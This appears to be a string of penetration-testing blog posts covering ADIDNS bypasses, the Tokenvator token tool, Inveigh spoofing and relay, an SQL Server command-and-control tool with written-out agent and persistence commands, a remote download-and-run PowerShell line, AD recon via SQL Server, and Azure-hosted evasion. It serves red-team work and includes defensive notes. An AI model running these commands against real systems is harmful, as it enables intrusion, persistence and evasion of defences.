I included details for the three GQBL bypasses when I turned my ADIDNS research over to Microsoft back in June. They informed me that they would assign CVE-2018-8320 for the GQBL and release a patch in October. I then disclosed the ADIDNS research while excluding any reference to WPAD and the GQBL.

The patch did indeed land in October. Here is a run-through of each bypass method on fully patched systems.

Gqbl Wildcard

Wildcard records no longer resolve requests for hosts listed on the GQBL.

Gqbl Dname

DNAME records no longer resolve requests for hosts listed on the GQBL.

Gqbl Ns

As you can see in the above screenshot, NS records continue to bypass the GQBL.

Ns Mac

Domain Suffix Search Order

In the original blog post, I recommended administrator controlled wildcard records as a defense against both ADIDNS wildcard attacks and LLMNR/NBNS spoofing. In a conversation that took place on r/netsec, a couple of people pointed out that wildcard records could cause problems when multiple domain suffixes are assigned to the search list through group policy.

Dnssuffixlist

After performing a few tests, I confirmed that they were correct. A wildcard placed in the zone of the higher domain suffix will prevent valid non-fully qualified requests from falling down to any lower domain suffixes where the matching valid record exists.

Dnssuffixtest

This behavior leads to an entirely new attack approach. Instead of targeting non-existent records in a zone, you can target requests for existing records. If you can add records to a zone listed as a suffix, you can target valid hosts in any lower priority domain suffix. Non-fully qualified requests for the targeted host will be resolved by the record you added.

Dnssuffixhosttest

Note, DNS suffixes should be taken into consideration when performing wildcard attacks. If you find a search list with multiple DNS suffixes, wildcard attacks could lead to disruptions when injecting into anything but the last zone on the list.

ADIDNS Attacks Through Phishing

With LLMNR/NBNS spoofing, the spoofing tool must continue to run throughout the attack. ADIDNS attacks however are conducted through only a small number of initial actions. Because of this, I believe that ADIDNS attacks are easier to deliver through phishing. Only one AD connected phishing target would need to execute a payload in order to add records potentially capable of sending traffic to remote, attacker controlled systems. You can use these records for things such as C2 or setting up additional phishing attacks.

Domainborrowing

Above is an example of adding a record pointing to a public IP using one of my PowerShell tools. For an actual phishing attack, you can use something more payload appropriate.

This is another area where NS records can be helpful for attacks. Once you setup the NS record, you can simply add additional records to the controlled subdomain through your own DNS server.

Domain Borrowing

ADIDNS attacks from outside the perimeter are particularly interesting when a company’s internal AD domain matches their public domain. In this scenario, you may be able to leverage the trust of the public domain to get around content filtering.

Domainborrowing

Of course, there are limitations with this technique. You will only be in a position to impact resources that are using the targeted ADIDNS for name resolution. There is also a chance that the records themselves, or any corresponding event IDs, will give you away. Most importantly, you will have a hard time setting up a trusted certificate for HTTPS due to lack of domain ownership.

C2 and Exfiltration Techniques

A while back, harmj0y posted an interesting blog about using AD as a C2 channel. How does that tie into ADIDNS? To review, when adding dnsNode objects, authenticated users receive full control upon creation. The dnsNode objects also contain a number of writable attributes. This results in dnsNode objects being candidates for C2 and exfiltration techniques through AD.

Of course, purely DNS based C2 and exfiltration techniques are also possible.

ADIDNS Defense Revisited

As mentioned, if you are using a search list with multiple DNS suffixes, an administrator controlled wildcard A record may cause problems. As an alternative, you can create a wildcard using a record type, such as a TXT record, that will not resolve name requests.

Txtrecord

Since all record types are stored on a dnsNode object, adding any form of wildcard record will prevent an unprivileged user from adding their own dnsNode named ‘*’. Unfortunately, a non-resolving wildcard record will not have the added benefit of being a defense against LLMNR and NBNS spoofing.

Txtrecord

Ultimately, locking down the zone permissions is the cleanest way to mitigate authenticated user ADIDNS attacks. Depending on your setup, you may be able to take advantage of a dedicated DNS dynamic updates account within DHCP. This may allow you to remove the ‘Create all child objects’ permission for ‘Authenticated Users’ altogether.

Finally, keep in mind that many name resolution attacks are made possible by non-fully qualified name requests. User generated requests of this type are difficult to eliminate. When it comes to system and application configurations though, I would recommend always using fully qualified domain names if possible.

Wildcarddefenserevisited

Back

Tokenvator: Release 2

What is Tokenvator?

Tokenvator is a token manipulation utility that is primarily used to alter the privileges of a process. In the original release we primarily focused on elevating process privileges. In this release, in addition to the usual bug fixes and improving existing features, I added several new features:

  • The ability to display additional token information
  • A help command that’s actually useful
  • Disabling and Removing Token Privileges
  • Named Pipe Tokens
  • Minifilter Manipulation

Use Cases:

There are a multitude of instances where elevating privilege or duplicating another processes token is necessary to proceed on an assessment. Most credential theft mechanisms require SYSTEM privileges, and now an impersonated SYSTEM token may not be enough. Tokenvator now tries to not only impersonate tokens, but also tries to start the process with a primary token.

Samdump

Displaying Token Information:

It can be useful to know some limited information about the token. For instance, just because you’re impersonating a token doesn’t mean you inherit all the privileges of the token. For instance, not all SYSTEM tokens are created or impersonated identically.

In the example below we are operating as SYSTEM but are still in our original groups.

Img Ba Ba Bc C

However, in the second example below, we got SYSTEM via the command GetSystem and are operating as SYSTEM and are placed in the relevant groups for SYSTEM.

Img Ba Ba C Bf

In this final example we got SYSTEM via the command GetSystem cmd.exe which used the same token to start a new process.

Img Ba Ba E Bf D

Help Command Changes

In the first release, the help command left a lot to be desired, when the author of the tool can’t remember how to run the command and the help menu doesn’t help him… there might be a problem.  So some changes were may to provide some additional help for each supported method.  Below is an example.

Img Ba C F C

Img Ba C Ffe Da

Token Privilege Modifications:

In the previous release it was possible to enable a privilege on a process. In this example we are enabling SeSystemEnvironmentPrivilege on LogonUI.

Img Ba C Dd D

That’s neat, but what if we wanted to remove privileges from a process?

Tokenvator now supports disabling or deleting a privilege placed on a process. In this instance we first disable and then remove the SeDebugPrivilege from the Powershell 6 process (pwsh.exe).

Disable Remove

But what if we really don’t want a process to have any privileges on a system? That is possible as well. In this example we remove all the privilege held by the splunkd process token. My intent is not to pick on Splunk, splunkd was just the first thing in my lab that met the example criteria. 😉

Nuke

Named Pipe Tokens

There are instances where we don’t  have the SeDebugPrivilege and thus cannot open a process we do not own. In these instances, we need a different method to GetSystem. This is where named pipes come into play. Via the Windows API’s we have the native ability to impersonate anyone who connects to our named pipe.

Img Ba C C

This can be useful in other situations where services connect to a known named pipe name. In these instances, we can create an arbitrary named pipe and steal the remote processes token as soon as they connect and write to our pipe. For processes that use named pipes for inter process communication this opens up a potential attack surface.

Img Ba C F B

Minifilters:

Many defensive products use hooks to intercept calls to check for malicious activity. Microsoft has strongly suggested that when it comes to the file system, vendors do not hook calls but instead use Minifilters which will be passed the file system data. AV / EDR products are given a specified altitude or precedence in which they are to inspect the file. This aspect of them also makes them trivial to identify.

Below are the Minifilters associated with Windows Defender and vShield.

Img Ba C Bdf

Img Ba C Af

DeviceMup is the Minifilter associated with UNC paths. To detach the filter monitoring network paths we can run a simple command. Note: Not all Minifilters can be detached, however many, many can be. This is because not all filters programmed with an unload routine, which prevents Minifilters from gracefully unloading.

Img Ba C F A

In the following demo we are going to be detaching a Minifilter from a file system so that we can run our tool while the AV product is still running.

Filters

If you’re looking for a more permanent way to disable Minifilters, I would suggest looking at this registry key.

Img Ba C B Ed

So that’s all for this release. Thank you to everyone took the time to file bug reports and let me know how they were using the tool. And a special thank you to those who submitted pull requests for this release. If you have any suggestions or feature requests please feel free to let me know.

Back

Inveigh – What's New in Version 1.4

Ugh, I can’t believe it’s been a year and a half since the last release of Inveigh. I had intended to complete a new version back in March. At that time, my goals were to perform some refactoring, incorporate dynamic DNS updates, and add the ability to work with shares through NTLM challenge/response relay. In the end, the refactoring is really the only thing that went as planned. Oh well, September isn’t really all that far past March, right?

Wait, what’s an Inveigh?

If you aren’t familiar with Inveigh, here’s how I describe it on the wiki:

“Inveigh is a PowerShell LLMNR/mDNS/NBNS spoofer and man-in-the-middle tool designed to assist penetration testers/red teamers that find themselves limited to a Windows system. At its core, Inveigh is a .NET packet sniffer that listens for and responds to LLMNR/mDNS/NBNS requests while also capturing incoming NTLMv1/NTLMv2 authentication attempts over the Windows SMB service. The primary advantage of this packet sniffing method on Windows is that port conflicts with default running services are avoided. Inveigh also contains HTTP/HTTPS/Proxy listeners for capturing incoming authentication requests and performing attacks. Inveigh relies on creating multiple runspaces to load the sniffer, listeners, and control functions within a single shell and PowerShell process.”

I often hear people simply say, “Inveigh is the PowerShell version of Responder.” Which always makes mumble to myself about packet sniffing and other design differences that are probably meaningless to most. Regardless of how Inveigh is described though, if you have used Responder, Inveigh’s functionality will be easy to understand. The main difference being that where Responder is the go to tool for performing LLMNR/NBNS spoofing attacks, Inveigh is more for PowerShell based Windows post-exploitation use cases.

Inveigh

What’s new in Inveigh 1.4

In this blog post, I’ll go through the following major additions and details related to Inveigh 1.4:

Invoke-Inveigh Additions

Invoke-Inveigh is the main LLMNR, mDNS, and NBNS spoofing module.

ADIDNS Attacks

For a detailed explanation of ADIDNS attack techniques, see my blog post on the subject.

Inveigh now contains the following two optional ADIDNS attacks:

  • Wildcard – Inveigh will add a wildcard record to ADIDNS at startup.

Inveigh Wildcard

  • Combo – Inveigh keeps track of LLMNR/NBNS name requests. If the module sees the same request from a specified number of different systems, a matching record will be added to ADIDNS.

Inveigh Combo

Inveigh’s automated approach may not always be the best way to perform ADIDNS attacks, for manual options, see my Powermad project.

Note, the ADIDNS attacks ended up replacing and extending the role I had originally planned for dynamic DNS updates. I removed the dynamic DNS update code that existed in some of the early 1.4 dev versions.

Additional Detection Evasion Options

There are lots of tools designed to detect LLMNR and/or NBNS spoofers. Last year at DerbyCon, Beau Bullock, Brian Fehrman, and Derek Banks released CredDefense. This toolkit contains a spoofer detection tool named ResponderGuard. This tool can send requests directly to a host IP address rather than the traditional multicast/broadcast addresses. This technique has the added benefit of allowing detection across subnet boundaries. Inveigh can now detect and ignore these types of requests in order to help avoid detection.

I’ve also been noticing that endpoint protection products are leveraging agents to detect LLMNR/NBNS spoofers. If you see lots of random requests originating from each workstation, this detection technique is potentially in use. The ideal evasion technique is to watch the request traffic and pick out specific, potentially safe names to spoof. However, in an attempt to automate evading this type of detection, I’ve added the option to prevent Inveigh from responding to specific name requests unless they have been seen a specified number of times and/or from a specified number of different hosts. This should help weed out the randoms at the cost of skipping less frequent legitimate requests.

Invoke-InveighRelay Additions

Invoke-InveighRelay is the HTTP, HTTPS, and Proxy to SMB relay module. I may have gotten a little carried away with the additions to this module for just a single release. The file share functionality lead to maintaining authenticated SMB sessions, which begged for more targets, which inspired target enumeration (thanks Scott!), which reminded me of BloodHound, and now it’s September.

Relay Attacks

The new version contains the following three SMB2.1 compatible attacks:

  • Enumerate – The enumerate attack can perform Group, User, Share, and NetSession enumeration against a target.
  • Execute – Performs PSExec style command execution. In previous versions of Inveigh Relay, this was the only available attack. Note, I removed SMB1 support.
  • Session – Inveigh Relay can now establish and maintain privileged/unprivileged authenticated SMB sessions. The sessions can be accessed with Invoke-SMBClient, Invoke-SMBEnum, and Invoke-SMBExec from my Invoke-TheHash project. Inveigh Relay will attempt to keep the sessions open as long as the module is running.

Inveigh Relay

Inveigh Relay will accept any combination of the three attacks chained together.

Disclaimer, I didn’t originally design the Invoke-TheHash SMB tools with with this type of usage in mind. I will likely need to at least beef up the SMB error handling.

Multiple Target Handling

Previously, Inveigh Relay could only target a single system. With the addition of the session attack, I thought it made sense add the capability to target multiple systems without restarting the module. My initial implementation attempts focused on simply identifying valid targets and preventing things like unnecessarily performing the same source/destination relays over and over.

Later, after I created Invoke-SMBEnum for performing enumeration tasks, I started thinking that it would be useful to incorporate the enumeration code directly into Inveigh Relay. This would allow me to leverage the results, combined with incoming user session information obtained through relay, for making targeting decisions. Basically, the module would gather as much information about the environment as possible through unprivileged user relays and attempt to use that information to find relay source/target combinations that will provide privilege or access to file shares.

Inveigh Relay stores the following target information in memory, most of which is used for targeting decisions:

  • IP – Target’s current IP address.
  • Hostname – Target’s hostname.
  • DNS Domain – Target’s AD domain in DNS format.
  • NetBIOS Domain – Target’s AD domain in NetBIOS format.
  • Sessions – Target’s identified user sessions.
  • Administrators Users – Local Administrators group, user members.
  • Administrators Groups – Local Administrators group, group members.
  • Privileged – Users with command execution privilege on the target.
  • Shares – Target’s custom share if any.
  • NetSessions – Target’s NetSessions minus the NetSessions generated through the relay process.
  • NetSession Mapped – User sessions discovered through enumerating NetSessions on other targets.
  • Local Users – Target’s local users.
  • SMB2.1 – Status of SMB2.1 support on the target.
  • Signing – Status of SMB signing requirements on the target.
  • SMB Server – Whether or not SMB is running and accessible on the target.
  • DNS Record – Whether or not a DNS record was found if a lookup was performed.
  • IPv6 Only – Whether or not the host is IPv6 only.
  • Targeted – Timestamp for when the target was last targeted.
  • Enumerate – Timestamp for when the target was last enumerated with the ‘Enumerate’ attack.
  • Execute – Timestamp for the last time command execution was performed through the ‘Execute’ attack on the target.

Inveigh Enumerate

One quick note regarding unprivileged system enumeration. You will likely encounter more and more systems that do not allow some forms of unprivileged enumeration. See this post from Microsoft for more details.

So far, Inveigh Relay uses the following priority list to select a target:

  1. Local Administrators Group (User Members) – The module will lookup previously observed user sessions attached to an incoming connection. Next, Inveigh Relay will search for matches in the target pool’s enumerated local Administrators groups.
  2. Local Administrators Group (Nested Group Members) – The module will lookup previously observed user sessions attached to an incoming connection. Next, Inveigh Relay will attempt to identify AD group membership for the sessions. Finally, the module will search for group matches in the target pool’s enumerated local Administrators groups. Note, Inveigh Relay alone does not have the ability to enumerate Active Directory (AD) group membership
  3. NetSessions –  The module will get the IP address of an incoming connection. Next, Inveigh Relay will search for matches within the target pool’s NetSessions. For example, if an incoming connection originates from ‘192.168.1.100’ any system with a NetSession that contains ‘192.168.1.100’ is a potential target.
  4. Custom Shares – The module will target systems that host custom shares (not defaults like C$, IPC$, etc) that may be worth browsing with multiple users.
  5. Random – The module will optionally select a random target in the event an eligible target has not been found through the above steps. Inveigh Relay will apply logic to prioritize and exclude targets from within the random target pool.

Inveigh Target

BloodHound Integration

Once I started putting together targeting based on enumeration, I was of course reminded of the awesome BloodHound project. Since I consider Inveigh’s default state to be running from a compromised AD system, access to AD has usually already been achieved. With AD access, BloodHound can gather most of the same information as Inveigh Relay’s Enumerate attack with the bonus of having visibility into AD group membership.

When using imported BloodHound data, think of Inveigh Relay as one degree of local privilege whereas BloodHound is six degrees of domain admin. Inveigh Relay does not have full BloodHound path visibility. It is still a good idea to identify and specify relay targets which will grant the access required for the engagement goals.

Second disclaimer, I’ve mostly just tested targeting through BloodHound data in my lab environments. There are probably plenty of scenarios that can throw off the targeting, especially with large environments. I’ll continue to make adjustments to the targeting.

ConvertTo-Inveigh

ConvertTo-Inveigh is a new support function capable of importing BloodHound’s groups, computers, and sessions JSON files into memory.

Convertto Inveigh

Project Links

Here are links to all of the projects mentioned in this blog post:

Inveigh: https://github.com/Kevin-Robertson/Inveigh

Invoke-TheHash: https://github.com/Kevin-Robertson/Invoke-TheHash

Powermad: https://github.com/Kevin-Robertson/Powermad

BloodHound: https://github.com/BloodHoundAD/BloodHound

Responder: https://github.com/lgandx/Responder

CredDefense Toolkit: https://github.com/CredDefense/CredDefense

What’s next for Inveigh?

For this version, I need to update the wiki, perform lots of targeting tweaks, and fix bugs. After that, I’m not entirely sure. There is certainly more to explore with BloodHound integration such as exporting session information collected through Inveigh. I’d also like to revisit my original unreleased C# PoC version of Inveigh. As for today though, I’m just happy to have finally escaped my dev branch.

Questions?

If you have any questions, reach out to me @kevin_robertson on Twitter or the amazingly helpful BloodHound Gang slack. Also, feel free to say hi if you see me wandering around DerbyCon!

Back

Databases and Clouds: SQL Server as a C2

There is no shortage of dependable control channels or RATs these days, but I thought it would be a fun side project to develop one that uses SQL Server. In this blog, I’ll provide an overview of how to create and maintain access to an environment using SQL Server as the controller and the agent using a new PoC script called SQLC2.

It should be interesting to the adversarial simulation, penetration testing, red, purple, blue, and orange? teams out there looking for something random to play with.  Did I miss any marketing terms?

Why SQL Server?

Well, the honest answer is I just spend a lot of time with SQL Server and it sounded fun.  However, there are practical reasons too.  More companies are starting to use Azure SQL Server databases. When those Azure SQL Server instances are created, they are made accessible via a subdomain of “*.database.windows.net” on port 1433. For example, I could create an SQL Server instance named “mysupersqlserver.database.windows.net”. As a result, some corporate network configurations allow outbound internet access to any “*.database.windows.net” domain on port 1433.

So, the general idea is that as Azure SQL Server adoption grows, there will be more opportunity to use SQL Server as a control channel that looks kind of like normal traffic .

SQLC2 Overview

SQLC2 is a PowerShell script for deploying and managing a command and control system that uses SQL Server as both the control server and the agent.

Basic functionality includes:

  • Configuring any SQL Server to be a controller
  • Installing/Uninstalling PowerShell and SQL Server based SQLC2 agents on Windows systems
  • Submitting OS commands remotely
  • Recovering OS command results remotely

SQLC2 can be downloaded from https://github.com/NetSPI/SQLC2/.

At its core, SQLC2 is just a few tables in an SQL Server instance that tracks agents, commands, and results. Nothing too fancy, but it may prove to be useful on some engagements.  Although this blog focuses on using an Azure SQL Server instance, you could host your own SQL Server in any cloud environment and have it listen on port 443 with SSL enabled. So, it could offer a little more flexibility depending on how much effort you want to put into it.

Naturally, SQLC2 was built for penetration test and red team engagements but be aware that for this release I didn’t make a whole lot of effort to avoid blue team detection. If that’s your goal, I recommend using the “Install-SQLC2AgentLink” agent installer instead of “Install-SQLC2AgentPs”. The link agent operates almost entirely at the SQL Server layer and doesn’t use any PowerShell so it’s able to stay under the radar more than the other supported persistence methods.

Below is a diagram illustrating the SQLC2 architecture.

Img B B

For those who are interested, below I’ve provided an overview of the Azure setup, and a walkthrough of the basic SQLC2 workflow. Enjoy!

Setting Up an SQL Server in Azure

I was going to provide an overview of how to setup an Azure database but  Microsoft has already written a nice article on the subject. You can find it at
https://docs.microsoft.com/en-us/azure/sql-database/sql-database-get-started-portal.

SQLC2: Installing C2 Server Tables

The SQLC2 controller can be installed on any SQL Server by creating two tables within the provided database.  That database will then be used in future commands to check-in agents, download commands, and upload command results.

Below is the command to setup the SQLC2 tables in a target SQL instance.

Install-SQLC2Server -Verbose -Instance sqlserverc21.database.windows.net -Database test1 -Username CloudAdmin -Password 'BestPasswordEver!'

Sqlc Install Sqlc Server

You can use the SQLC2 command below to check which agents have phoned home. However,  there wont be any agents registered directly after the server installation.

Get-SQLC2Agent -Verbose -Instance sqlserverc21.database.windows.net -Database test1 -Username CloudAdmin -Password 'BestPasswordEver!'

Sqlc Checkforregisteredagents

Once agents and commands have been processed the actual C2 tables will simply store the data.  You can also connect directly to your Azure SQL Server with SQL Server Management Studio to view the results as well.  Below is an example screenshot.

Img B Faddd B

SQLC2: Installing C2 Agents

SQLC2 supports three methods for installing and running agents for downloading and executing commands from the C2 server.

  1. Direct Execution: Executing directly via the Get-SQLC2Command
  2. Windows Schedule Task: Installing an SQLC2 PowerShell agent to run via a scheduled task that runs every minute.
  3. SQL Server Agent Job: Installing an SQLC2 SQL Server agent job that communicates to the C2 server via a server link.

Option 1:  Direct Execution

You can list pending commands for the agent with the command below.   All Get-SQLC2Command execution will automatically register the agent with the C2 server.

Get-SQLC2Command -Verbose -Instance sqlserverc21.database.windows.net -Database test1 -Username CloudAdmin -Password 'BestPasswordEver!'

Sqlc Registersystem Checkforcommands

Adding the -Execute flag with run pending commands.

Get-SQLC2Command -Verbose -Execute -Instance sqlserverc21.database.windows.net -Database test1 -Username CloudAdmin -Password 'BestPasswordEver!'

Sqlc Registersystem Checkforcommandsandrunthem

The examples above show how to run SQLC2 commands manually. However, you could have any persistence method load SQLC2 and run these commands to maintain access to the environment.

Option 2:  Windows Scheduled Task

Installing an SQLC2 PowerShell agent to run via a scheduled task that runs every minute. Note: Using the -Type parameter options you can also install persistence via “run” or “image file execution options” registry keys.

Install-SQLC2AgentPs -Verbose -Instance sqlserverc21.database.windows.net -Database test1 -Username CloudAdmin -Password 'BestPasswordEver!'

Sqlc Persistpsinstall

It can be uninstalled with the command below:

Uninstall-SQLC2AgentPs -Verbose

Sqlc Persistpsuninstall

Option 3:  SQL Server Agent Job

Installing an SQLC2 SQL Server agent job that communicates to the C2 server via a server link.

Install-SQLC2AgentLink -Verbose -Instance 'MSSQLSRV04SQLSERVER2014' -C2Instance sqlserverc21.database.windows.net -C2Database test1 -C2Username CloudAdmin -C2Password 'BestPasswordEver!'

Sqlc Installlinkpersist

For those who are interested, I’ve also provided a TSQL version of the SQL Server agent installer you can find at https://github.com/NetSPI/SQLC2/blob/master/tsql/Install-SQLC2AgentLink.sql.

It can be uninstalled with the command below.

Uninstall-SQLC2AgentLink -Verbose -Instance 'MSSQLSRV04SQLSERVER2014'

Sqlc Installlinkpersistremove

SQLC2: Issuing OS Commands

To send a command to a specific agent, you can use the command below. Please note that in this release the agent names are either the computer name or sql server instance name the agent was installed on.  Below are a few command examples showing a registered agent and issuing a command to it.

Get-SQLC2Agent -Verbose -Instance sqlserverc21.database.windows.net -Database test1 -Username CloudAdmin -Password 'BestPasswordEver!'

Sqlc Agentischeckin

Set-SQLC2Command -Verbose -Instance sqlserverc21.database.windows.net -Database test1 -Username CloudAdmin -Password 'BestPasswordEver!' -Command "Whoami" -ServerName MSSQLSRV04

Sqlc Set Command For Agent

SQLC2: Get Command Results

Below is the command for actually viewing the command results. It supports filters for servername, command status, and command id.

Get-SQLC2Result -Verbose -ServerName "MSSQLSRV04" -Instance sqlserverc21.database.windows.net -Database test1 -Username CloudAdmin -Password 'BestPasswordEver!'

Sqlc Getcommandresults

SQLC2: Uninstalling C2 Tables

Below are some additional commands for cleaning up when you done.  They include commands to clear the command history table, clear the agent table, and remove the C2 tables all together.

Clear command history:
Remove-SQLC2Command -Verbose -Instance sqlserverc21.database.windows.net -Database test1 -Username CloudAdmin -Password 'BestPasswordEver!'
Clear agent list:
Remove-SQLC2Agent -Username c2admin -Password 'SqlServerPasswordYes!' -Instance sqlserverc21.database.windows.net -Database test1 -Verbose
Remove SQLC2 tables:
Uninstall-SQLC2Server -Verbose -Instance sqlserverc21.database.windows.net -Database test1 -Username CloudAdmin -Password 'BestPasswordEver!'

Blue Team Notes

  • The PowerShell commands and agents should show up in your PowerShell logs which can be a useful data source.
  • The persistence methods for tasks, registry run keys, and “image file execution options” registry keys can all be audited, and alerts can be configured. The commands used to create the persistence also tend to generate Windows event logs can all be useful and most Endpoint Detection and Response solutions can identify the commands at execution time.
  • If possible, deploy audit configurations to internal SQL Servers to help detect rogue agent jobs, ad-hoc queries, and server links. I have some old examples of logging options here. If configured correctly they can feed alert directly into the Windows event log.
  • Although it’s harder than it sounds, try to understand what’s normal for your environment. If you can restrict access to “*.database.windows.net” to only those who need it, then it can be an opportunity to both block outbound access and detect failed attempts.  Network and DNS logs can come in handy for that.

Wrap Up

SQLC2 is a pretty basic proof of concept, but I think it’s functional enough to illustrate the idea.  Eventually, I’ll likely role it into PowerUpSQL for the sake of keeping the offensive SQL Server code together. At that point, maybe I’ll also role in a few CLR functions to step it up a bit.  In the meantime, for those of you looking to explore more offensive cloudscape options, check out Karl Fosaaen’s blog on other Azure services that can be useful during red team engagements. It’s pretty interesting.

Back

Dumping Active Directory Domain Info – with PowerUpSQL!

This blog walks through how to use the OLE DB ADSI provider in SQL Server to query Active Directory for information.  I’ll also share a number of new PowerUpSQL functions that can be used for automating common AD recon activities through SQL Server. Hopefully this will be useful to red teamers, pentesters, and database enthusiasts. Thanks to Scott Sutherland (@_nullbind) for his work on both the AD recon functions and PowerUpSQL!

The T-SQL

The T-SQL below shows how the ADSI provider is used with OPENQUERY and OPENROWSET to query for Active Directory information. First, a SQL Server link needs to be created for the ADSI provider. A link is created with the name “ADSI”.

-- Create SQL Server link to ADSI
IF (SELECT count(*) FROM master..sysservers WHERE srvname = 'ADSI') = 0
EXEC master.dbo.sp_addlinkedserver @server = N'ADSI',
@srvproduct=N'Active Directory Service Interfaces',
@provider=N'ADSDSOObject',
@datasrc=N'adsdatasource'
ELSE
SELECT 'The target SQL Server link already exists.'
Img Afdf C E

If using OPENQUERY, associate the link with the current authentication context. A username and password can also be specified here. Then run the example query.

Note: The LDAP “path” should be set to the target domain.

-- Define authentication context - OpenQuery
EXEC sp_addlinkedsrvlogin
@rmtsrvname=N'ADSI',
@useself=N'True',
@locallogin=NULL,
@rmtuser=NULL,
@rmtpassword=NULL
GO
-- Use openquery
SELECT *
FROM OPENQUERY([ADSI],'<LDAP://path>;(&(objectCategory=Person)(objectClass=user));name, adspath;subtree')
Img Afdf E D

If using OPENROWSET, enable ad hoc queries. Then run the example query with a specified username and password or default authentication.

Note: The LDAP “path” should be set to the target domain.

-- Enable 'Show Advanced Options'
EXEC sp_configure 'Show Advanced Options', 1
RECONFIGURE
GO

-- Enable 'Ad Hoc Distributed Queries'
EXEC sp_configure 'Ad Hoc Distributed Queries', 1
RECONFIGURE
GO

-- Run with openrowset
SELECT *
FROM OPENROWSET('ADSDSOOBJECT','adsdatasource',
'<LDAP://path>;(&(objectCategory=Person)(objectClass=user));name, adspath;subtree')
Img Afdf Cc C

Loading PowerUpSQL

PowerUpSQL can be loaded quite a few different ways in PowerShell. Below is a basic example showing how to download and import the module from GitHub.

IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1")

Newly Added Active Directory Recon Functions

Now that you have PowerUpSQL loaded, you can use the new commands to execute queries against the domain.  However, please be aware that all commands require sysadmin privileges.

Function NameDescription
Get-SQLDomainAccountPolicyProvides the domain account policy for the SQL Server’s domain.
Get-SQLDomainComputerProvides a list of the domain computers on the SQL Server’s domain.
Get-SQLDomainControllerProvides a list of the domain controllers on the SQL Server’s domain.
Get-SQLDomainExploitableSystemProvides a list of the potential exploitable computers on the SQL Server’s domain based on Operating System version information.
Get-SQLDomainGroupProvides a list of the domain groups on the SQL Server’s domain.
Get-SQLDomainGroupMemberProvides a list of the domain group members on the SQL Server’s domain.
Get-SQLDomainObjectCan be used to execute arbitrary LDAP queries on the SQL Server’s domain.
Get-SQLDomainOuProvides a list of the organization units on the SQL Server’s domain.
Get-SQLDomainPasswordsLAPSProvides a list of the local administrator password on the SQL Server’s domain. This typically required Domain Admin privileges.
Get-SQLDomainSiteProvides a list of sites.
Get-SQLDomainSubnetProvides a list of subnets.
Get-SQLDomainTrustProvides a list of domain trusts.
Get-SQLDomainUserProvides a list of the domain users on the SQL Server’s domain.
Get-SQLDomainUser -UserState DisabledProvides a list of the disabled domain users on the SQL Server’s domain.
Get-SQLDomainUser -UserState EnabledProvides a list of the enabled domain users on the SQL Server’s domain.
Get-SQLDomainUser -UserState LockedProvides a list of the locked domain users on the SQL Server’s domain.
Get-SQLDomainUser -UserState PreAuthNotRequiredProvides a list of the domain users that do not require Kerberos preauthentication on the SQL Server’s domain.
Get-SQLDomainUser -UserState PwLastSet 90This parameter can be used to list users that have not changed their password in the last 90 days. Any number can be provided though.
Get-SQLDomainUser -UserState PwNeverExpiresProvides a list of the domain users that never expire on the SQL Server’s domain.
Get-SQLDomainUser -UserState PwNotRequiredProvides a list of the domain users with the PASSWD_NOTREQD flag set on the SQL Server’s domain.
Get-SQLDomainUser -UserState PwStoredRevEncProvides a list of the domain users storing their password using reversible encryption on the SQL Server’s domain.
Get-SQLDomainUser -UserState SmartCardRequiredProvides a list of the domain users that require smart card for interactive login on the SQL Server’s domain.
Get-SQLDomainUser -UserState TrustedForDelegationProvides a list of the domain users trusted for delegation on the SQL Server’s domain.
Get-SQLDomainUser -UserState TrustedToAuthForDelegationProvides a list of the domain users trusted to authenticate for delegation on the SQL Server’s domain.

Dumping Domain Users Examples

This example shows how to gather a list of enabled domain users using a Linked Server via OPENQUERY.

Get-SQLDomainUser -Instance MSSQLSRV04SQLSERVER2014 -Verbose -UserState Enabled
Img Afdfb A Ffee

Alternatively, the command can be run using ad hoc queries via OPENROWSET as shown below.  Its nothing crazy, but it does provide a few options for avoiding detection if the DBAs are auditing for linked server creation, but not ad hoc queries in the target environment.

Get-SQLDomainUser -Instance MSSQLSRV04SQLSERVER2014 -Verbose -UserState Enabled -UseAdHoc
Img Afdfb D Caec

The functions also support providing an alternative SQL Server login for authenticating to the SQL Server and an alternative Windows credential for configuring server links.  More command examples can be found here.

The Authentication and Authorization Matrix

Depending on the current user’s security context or the provided credentials, the user may not have access to query AD for information. The tables below illustrate privileges and the corresponding access.

OPENQUERY (Linked server) auth table by Scott Sutherland (@_nullbind)

Current User (Domain User – Public)Current User (Domain User – Sysadmin)Current User (SQL Login – Public)Current User (SQL Login – Sysadmin)Provided Domain UserAccess
XNo
XYes
XNo
XNo
XXNo
XXYes
XXNo
XXYes

OPENROWSET (Ad Hoc query) auth table by Scott Sutherland (@_nullbind)

Current User (Domain User – Public)Current User (Domain User – Sysadmin)Current User (SQL Login – Public)Current User (SQL Login – Sysadmin)Provided Domain UserAccess
XNo
XYes
XNo
XYes
XXNo
XXYes
XXNo
XXYes

Conclusion

Recon is an essential first step in assessing the security of an Active Directory environment. Thanks to some great work by Will Schroeder (@harmj0y) and others on Powerview. Hopefully these AD recon functions will provide another medium to accomplish the same end.  For more information on the newly added AD recon functions, check out the PowerUpSQL wiki!

Back

Utilizing Azure Services for Red Team Engagements

Everything seems to be moving into the cloud, so why not move your red team infrastructure there too. Well… lots of people have already been doing that (see here), but what about using hosted services from a cloud provider to hide your activities within the safety of the provider’s trusted domains? That’s something that we haven’t seen as much of, so we decided to start investigating cloud services that would allow us to make use of subdomains from trusted domains.

There are multiple options for cloud providers, so for starters we will be just looking at Microsoft’s Azure services. Each cloud provider offers similar services, so you may be able to apply these techniques to other providers.

Domain Reputation Overview

Given that Domain Fronting is kind of on its way out, we wanted to find alternative ways to use trusted domains to bypass filters. One of the benefits of using Azure cloud services for red team engagements is the inherent domain reputation that comes with the domains that are hosting your data (Phishing sites, Payloads, etc.).

To be specific here, these are services hosted by Microsoft that are typically hosted under a Microsoft sub-domain (windows.net, etc.). By making use of a domain that’s already listed as “Good”, we can hopefully bypass any web proxy filters as we work through an engagement.

This is not a comprehensive list of the Azure services and corresponding domains, but we looked at the Talos reputation scores for some of the primary services. These scores can give us an idea of whether or not a web proxy filter would consider our destination domain as trusted. Each Azure domain that we tested came in as Neutral or Good, so that works in our favor.

ServiceBase DomainBase Web ReputationBase Weighted ReputationSubdomain Web ReputationSubdomain Weighted Reputation
App Servicesazurewebsites.netNeutralNo ScoreNeutralNo Score
Blob Storageblob.core.windows.netGoodGoodGoodGood
File Servicefile.core.windows.netGoodGoodGoodGood
